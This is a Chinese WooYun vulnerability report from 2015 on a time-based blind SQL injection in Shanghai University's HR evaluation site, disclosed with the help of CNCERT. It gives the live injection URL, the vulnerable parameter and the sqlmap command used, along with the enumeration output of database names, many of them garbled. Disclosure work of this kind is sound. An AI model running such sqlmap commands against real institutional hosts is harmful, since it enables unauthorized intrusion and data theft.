当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112789

漏洞标题:上海大学人事考核2012MSSQL注入一枚

相关厂商:上海大学

漏洞作者: 夸父追日

提交时间:2015-05-22 11:45

修复时间:2015-07-11 11:44

公开时间:2015-07-11 11:44

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-22: 细节已通知厂商并且等待厂商处理中
2015-05-27: 厂商已经确认,细节仅向厂商公开
2015-06-06: 细节向核心白帽子及相关领域专家公开
2015-06-16: 细节向普通白帽子公开
2015-06-26: 细节向实习白帽子公开
2015-07-11: 细节向公众公开

简要描述:

俺只求一个邀请码

详细说明:

基于时间的盲注,,太卡了,,我就爆了一下,,,太浪费时间了,,已验证该注入确实是存在的

漏洞证明:

注入点:http://hreva.shu.edu.cn:8088/JobsList.aspx?dept=-1&spec=-1&sta=30000001&job=-1&pert=-1
sqlmap.py -u "http://hreva.shu.edu.cn:8088/JobsList.aspx?dept=
-1&spec=-1&sta=30000001&job=-1&pert=-1" -p "spec" --dbs
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
[17:03:09] [INFO] fetching database names
[17:03:09] [WARNING] the SQL query provided does not return any output
[17:03:09] [WARNING] in case of continuous data retrieval problems you are advi
ed to try a switch '--no-cast' or switch '--hex'
[17:03:09] [INFO] fetching number of databases
[17:03:09] [INFO] resumed: 64
[17:03:09] [INFO] resumed: AlumniDB
[17:03:09] [INFO] resumed: BaseCent\\?81r
[17:03:09] [INFO] resumed: BPM
[17:03:09] [INFO] resumed: bps
[17:03:09] [INFO] resumed: BSCS
[17:03:09] [INFO] resumed: bscs-new
[17:03:09] [INFO] resumed: emrsyytem
[17:03:09] [INFO] resumed: feidphs
[17:03:09] [INFO] resumed: gonghui
[17:03:09] [INFO] resumed: health
[17:03:09] [INFO] resumed: HISBS
[17:03:09] [INFO] resumed: hischemical
[17:03:09] [INFO] resumed: hisciemicalYC
[17:03:09] [INFO] resumed: HisFenxiyi
[17:03:09] [INFO] resumed: HISJD
[17:03:09] [WARNING] cannot properly display Unicode characters inside Windows
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances w
ll result in replacement with '?' character. Please, find proper character repr
sentation inside corresponding output files.
[17:03:09] [INFO] resumed: ?ISYC\x05!a
[17:03:09] [INFO] resumed: InfoPlus\x19
[17:03:09] [INFO] resumed: InfoPlus_Dev!
[17:03:09] [INFO] resumed: InfoPlusMembership
[17:03:09] [INFO] resumed: InfoPl\\?81sMembershrp_Dev\x05
[17:03:09] [INFO] resumed: InfoPlusStrteAi
[17:03:09] [INFO] resumed: InfoPlusStatg_Dev\n\x03\x02
[17:03:09] [INFO] resumed: InkoTest(a
[17:03:09] [INFO] resumed: JiraaB
[17:03:09] [INFO] resumed: jkg\\?81ptA\x12
[17:03:09] [INFO] resumed: }wcqutaa$
[17:03:09] [INFO] resumed: Li?p\\?81p
[17:03:09] [INFO] resumed: m?\\?81?\\?a3?i\\?81d\\?9fa????\\?81\x04dq?\x12\x11\
03\x03
[17:03:09] [INFO] resumed: ?a樂?p?\\?81a\\?f9餆谈cd敆_\x7fe弄\\?82\x11!\x06!\t\
[17:03:09] [INFO] resumed: mxs?\\?f9r}\x11K'3
[17:03:09] [INFO] resumed: 'a???i??!!
[17:03:09] [INFO] resumed: \\?beaw攂?嵊a?\\?84\x03
[17:03:09] [INFO] resumed: M瀆焁z輁m?u缄#
[17:03:09] [INFO] resumed: M?B\\?a4
[17:03:09] [WARNING] time-based comparison requires larger statistical model, p
ease wait.............................

修复方案:

版权声明:转载请注明来源 夸父追日@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-05-27 11:43

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论